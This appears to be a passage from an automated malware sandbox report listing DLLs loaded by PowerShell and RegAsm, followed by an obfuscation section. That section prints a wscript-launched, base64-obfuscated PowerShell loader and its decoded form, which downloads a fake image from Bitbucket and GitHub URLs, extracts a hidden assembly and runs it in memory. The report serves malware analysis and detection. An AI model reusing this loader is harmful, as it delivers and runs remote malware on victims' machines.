                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Network");IWshNetwork2.ComputerName();IWshShell3.Run("powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#", "0")
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
